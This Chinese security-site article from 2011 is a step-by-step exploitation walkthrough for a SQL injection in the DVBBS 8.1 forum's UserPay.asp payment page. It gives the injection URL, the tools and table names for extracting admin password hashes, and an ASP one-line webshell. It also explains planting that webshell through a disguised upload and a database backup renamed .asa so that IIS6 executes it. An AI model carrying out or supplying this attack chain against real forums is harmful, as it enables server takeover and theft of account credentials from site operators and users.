首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
动网8.1最新注入0Day漏洞
来源:山东省实验中学 作者:付天顺 发布时间:2011-01-10  
2007年11月,国内最大的ASP论坛系统开发商动网正式发布DVBBS 8.1系列,新推出的8.1系列修正了大量BUG,在稳定性、安全性方面做了很大的改进,同时加入了大量的新功能,采用新的官方风格,更加贴近用户的使用习惯,受到广大站长和网友的好评。然而令人费解的是,新系统带给我们良好体验的同时,也带给了我们一个严重的安全漏洞(此漏洞在8.0中并不存在)。
今天我给大家带来的就是最新动网论坛的一个严重漏洞——点券购买页面注入漏洞。此漏洞可以直接导致任意注册用户拿到Admin用户账号及密码。
这个漏洞出现在动网论坛根目录的UserPay.asp文件中,注册用户任意购买一个东西,生成一个订单号即可构建存在注入漏洞的页面。下面我们来重点分析代码,找到导致漏洞的原因,以下是UserPay.asp中的漏洞代码。
 
If Request("raction")="alipay_return" Then
AliPay_Return()
Dvbbs.Footer()
Response.End
ElseIf Request("action")="alipay_return" Then
AliPay_Return()
Dvbbs.Footer()
Response.End
'ElseIf Request("action")="Re_inmoney" Then
'Re_inmoney()
'Dvbbs.Footer()
'Response.End
End If

有语言基础的朋友可以看出来,这里“raction”和“action”的判断条件都是“alipay_return”,且执行内容是相同的,都是调用了AliPay_Return()函数。我们继续搜索aliPay_return()函数的内容,在行329到行351,找到了该函数的代码。
Sub AliPay_Return()
If Dvbbs.Forum_ChanSetting(5) <> "0" Then
AliPay_Return_Old()
Exit sub
Else
Dim Rs,Order_No,EnCodeStr,UserInMoney
Order_No=Request("out_trade_no")
Set Rs = Dvbbs.Execute("Select * From [Dv_ChanOrders] Where O_IsSuc=3 And O_PayCode='"&Order_No&"'")
If not(Rs.Eof And Rs.Bof) Then
AliPay_Return_Old()
Exit sub
End if
Response.Clear
Set Rs = Dvbbs.Execute("Select * From [Dv_ChanOrders] Where O_IsSuc=0 And O_PayCode='"&Order_No&"'")
If Rs.Eof And Rs.Bof Then
Response.Write "N"
Else
Response.Write "Y"
Dvbbs.Execute("Update Dv_ChanOrders Set O_IsSuc=3 Where O_ID = " & Rs("O_ID"))
End If
Response.End
End If
End Sub


这里的条件判断中,“If Dvbbs.Forum_ChanSetting(5) <> "0"”这一句,意思就是如果Dvbbs.Forum_ChanSetting(5)不等于0,则执行。“<>”相当于C里的“!=”,不等于的意思。接下来,我们打开数据库,看看它默认的值是多少。
1,1,0,0,pay@aspsky.net,0,b63uvb8nsvsmbsaxszgvdr6svyus0l4t,1,1,1,1,1,1,1,100,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,

1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
Forum_ChanSetting(5)缺省为0,接下来我们看看下面的代码。
Order_No=Request("out_trade_no")
Set Rs = Dvbbs.Execute("Select * From [Dv_ChanOrders] Where O_IsSuc=3 And O_PayCode='"&Order_No&"'")
你会发现,程序直接接受获取的“Order_No”数据,没有经过任何处理!正如文章开头我们说的,此漏洞在Dvbbs 8.0中并不存在。8.0中AliPay_Return()函数的代码如下:
Sub AliPay_Return()
If Dvbbs.Forum_ChanSetting(5) <> "0" Then
AliPay_Return_Old()
Else
Response.Clear
Dim Rs,Order_No,EnCodeStr,UserInMoney
Order_No = Dvbbs.CheckStr(Request("order_no"))
Set Rs = Dvbbs.Execute("Select * From Dv_ChanOrders Where O_IsSuc=0 And O_PayCode = '"&Order_No&"'")
If Rs.Eof And Rs.Bof Then
Response.Write "N"


大家可以注意到“Order_No = Dvbbs.CheckStr(Request("order_no"))”这一句,这里的CheckStr()正是动网的检查非法字符函数,通过这个函数,检查、过滤非法字符,来达到防注入的目的。而到了DVBBS8.1中,却没有了这一句!(难道说DVBBS8.1为了提高速度,连检查字符串都去掉了!?)通过分析代码,我们构造这样的语句就可以触发漏洞:“http://IPaddress/userpay.asp?raction=alipay_return&out_trade_no=XXX”(XXX为你的订单号)。至此,漏洞代码及原理分析完了,下面我们开始进行实测。
用于测试的是本地局域网内的一台服务器,IP为192.168.0.101,端口8080。我们首先注册修改admin密码前台、后台均为920430(为了破解MD5方便,位数少些)。接着注册一个用户,然后依次点击“控制面板->购买论坛点券”,再点击“网上支付”按钮,如图1所示,之后出现的页面会报错,当然不是IIS的错,而是支付接口的错误,如图2所示。将其关闭,返回网站,点击“所有交易记录”,会看到有一个项目,还有一个订单号,如图3所示

图1
 
图2
 
图3
下面我们来构造URL:http://192.168.0.101:8080/userpay.asp?raction=alipay_return&out_trade_no=2008011317201363527b64cea5f,提交后先是返回一个字母Y,直接刷新页面后,返回如图4所示的错误,然后我们加个单引号,如图5所示。出错了,好,我们开始注入。
 

图4
 
图5
经过我的测试,推荐大家使用NBSI进行测试,因为我用明小子和HDSI都无法正常猜解(也可能是我这里的原因)。使用时,第一遍扫描不到漏洞,然后加上特征字符“非法”再检测就可以了。表名、列名如果猜解不出来,可以自己添加。表名为dv_admin和dv_user(前者是后台管理者账号、密码,后者是前台,有的记录会很多,只要前10个就够了,因为都是最早注册的,是管理员的几率很大。)列名为username、password、id三项,之后进行猜解,并对MD5密码破解验证,如图6所示。
 
图6
拿下后台之后,就该上传WebShell了。下面我来简单介绍一下DVBBS 8.1如何上传WebShell,还是利用假数据库。先登录后台,修改上传限制大小(通常这样一个库都要大于默认的100K)。本地构造一个数据库name.mdb,并在数据库中创建表“name”,在表中建立字段“name”,类型为文本型(名字大家可以自定义),属性为默认。在字段“name”中输入“<<%execute(request("name"))%>>”,保存退出,并修改后缀为txt,之后在论坛上传name.txt(这里是不会显示上传文件地址的),然后发布主题(一定要发布)。完成后我们登录后台,点击“文件管理->上传文件管理”,找到文件地址,如“../UploadFile/2008-1/200811319153335452.txt”,先备份数据库,默认即可。然后打开恢复数据库(注意,一定要提前备份数据库,下一步要覆盖数据,否则网站就报废了),填写刚才的地址,到备份数据库点击备份,目录写成name.asa,最后再把刚才备份的数据恢复回去即可。这样,我们的小马地址就是http://ipaddress/name.asa/name.mdb了(IIS6有个Bug,就是会把文件夹带asp后缀和asa后缀的里面的文件按照ASP解析执行)。
本文完成时,动网官方已经发布了紧急漏洞修补补丁(后台的上方消息栏会有提示),不过国内多数网站仍然没有修补此漏洞(大约有90%)。此漏洞影响严重,有使用DVBBS8.1的站长抓紧时间修补。同时提醒广大读者,此漏洞危害严重,仅做测试使用,不要做非法用途!本文全部为本地测试,并未危及到任何网站
 
文/图 山东省实验中学 付天顺


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·动网(DVBBS)Version 8.2.0 后
·ecshop最新版(v2.72) 本地包含漏
·最新ECshop 支付方式注射 0day
·华夏外挂下载系统2.0漏洞利用
·深圳迪蒙网络科技企业网站管理系
·Exploit Linux Kernel Slub Over
·v5Shop 注入 漏洞整理
·HDWiKi V 5.0 本地包含0Day
·ecshop后台写shell 0day
·UCenter Home 2.0 鸡叻 SQL 注入
·DEDECMS 0DAY
·Phpwind远程任意代码执行漏洞
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved